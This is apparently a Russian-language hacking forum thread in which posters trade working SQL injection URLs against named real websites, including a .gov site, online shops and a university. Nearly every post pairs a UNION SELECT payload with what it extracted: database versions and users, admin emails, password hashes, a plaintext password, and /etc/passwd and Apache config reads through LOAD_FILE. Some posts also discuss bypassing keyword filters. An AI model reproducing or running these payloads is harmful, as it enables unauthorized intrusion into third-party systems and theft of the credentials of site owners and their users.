SQL Инъекции

Code:

http://www.setasia.tv/shows/shows_inside.php?id=-1+union+select+1,version(),3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

4.0.13
root@localhost

Code:

http://www.e-norprint.co.uk/product_desc.php?id=-1+union+select+1,2,3,4,version(),6,7,8,user(),10,11,12,13,14,15,16,17,18/*

4.1.22-standard-log
norprint@localhost

 

http://www.repairgsm.ru/news/?id=-39+union+select+1,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),3,4,5,6,7+from+INFORMATION_SCHEMA.COLUMNS+limit+206,1/*


http://www.repairgsm.ru/news/?id=-39+union+select+1,concat(admin_firstname,char(58),admin_lastname,char(58),admin_email_address,char(58),admin_password,char(58),version(),char(58),database(),char(58),user()),3,4,5,6,7+from+admin/*

Admin: mr
pass: d24ce5e8a9d8884f68751318e43506dc:d6

 

http://rec.ustu.ru/?id=2&add=-1+union+select+1,2,3,concat(name,0x1,user,0x3,password),5,6+FROM+users+limit+0,1--

 

Hash:
8978de5fcec7b7d081a116d1ee85a879

Первая иньекция

 

поздравляю!

 

Жаль

 

Virtual Houston ARTCC

Code:

http://www.zhuartcc.com/module.php?page=events&view=event&id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10/*

5.0.45-community
zhuartcc_houston@localhost

************************************

Code:

http://www.finnica.fi/keski-suomi/kirkot/kirkkoesittely.php?id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10/*

5.0.32-Debian_7etch5-log
finnica@localhost
PR: 5

************************************

Code:

http://advakom.ru/eng/viewproduct.php?id=-1+union+select+1,2,3,version(),5,6,user(),8,database(),10,11,12,13/*

4.1.20-log
advakom_@localhost
advacom_bd

************************************

Code:

http://www.vikinggames.hu/product.php?id=-1+union+select+1,table_name,3,4,version(),6,7+from+information_schema.tables--

5.0.32-Debian_7etch5-log

************************************

Code:

http://www.profootball24x7.com/column_view.php?cid=-1+union+select+version()--

5.0.37-standard
[email protected]
ravens24x7

************************************

Code:

http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+version()/*

Code:

http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+table_name+from+information_schema.tables/*

Code:

http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+concat(haslo,char(58),login)+from+logi/*

Code:

http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+concat(login,char(58),haslo,char(58),mail,char(58),data,char(58),gg)+from+logi/*

5.0.45-community
efotki_admin@localhost
efotki_efotki

 

А вот и .GOV

_http://www.energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*

[email protected]:5.0.18-log:stateinfo

фильтрация from, но кому надо обойдёт

 

http://www.hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+null,null,null,concat(user,0x3a,password,0x3a,host),null,null,7,null+from+mysql.user

пароль вроде был 'yf[eq', сейчас не знаю.. раньше пасс и подходил для ssh

 

Если не секрет, как фильтрацию from обойти?
Прочитал кучу мануалов, не нашел.

 

Code:

http://www.canurb.com/events/event_details.php?id=-105+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*

5.0.45-community:canurb@localhost:canurb_cui
есть таблицы типа админ, юзер, но че то с ними не получилось =(

 

hxxp://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10/*

5.0.19-standard
root@localhost

кто найдёт раскрытие путей скажите.
ЗЫ. из базы ничего толкового невытащил. кроме како-го то паса "123456" в md5. логин ненашол. админки или чего-то подобного тоже.

 

Пути можешь сдесь посмотреть

_http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10/*

 

todobulla.cl

web7_u1@localhost:5.0.32-Debian_7etch1-log:web7_db1

Названия таблиц -

Названия столбцов -

 

Только учусь!
Сеть аптечных магазинов!

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables

админка

------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

 

Code:

http://www.budgiemania.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.tieltown.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.parrotrecipes.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://lawyerintl.com/modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*

Отвечаю мне так впадлу оформлять

 

http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,usr,3,pwd,5+from+zdp_usr/*
user: *****
pass: *****
+ заходит.

 

Muhacir
тебе делать нечего? человек написал:
"прошу на обсуждение в вопросы по уязвимостям"
Как ты думаешь зачем?Там полтора часа назад то_же самое обсуждали

 

Code:

http://www.canadahaitiaction.ca/local.php?id=-6+union+select+1,concat(email,0x3a,pass)+from+Members+limit+0,1/*

[email protected]:shawn

Code:

http://www.furthernoise.org/index.php?iss=-6+union+select+1,concat(name,0x3a,pass)+from+fn_users/*

Andy:‰ ÿ@b宽I™Þ_ˆý о_О какой то странный пароль

Code:

http://ukmoths.org.uk/show.php?id=-75+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,concat(version(),0x3a,database(),0x3a,user()),16/*

4.1.19-standard-log:ukmoths:[email protected]

 

http://www.ococtexas.org/

Code:

http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/*

Code:

[COLOR=Red][B]5.0.45-community-nt:ococ@localhost:ococ[/B][/COLOR]

Code:

http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCHEMA.TABLES%20--

http://www.ztocapital.com/

Code:

[B]http://www.ztocapital.com/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7,8,9/*[/B]

5.0.45-community-nt:zto@localhost:zto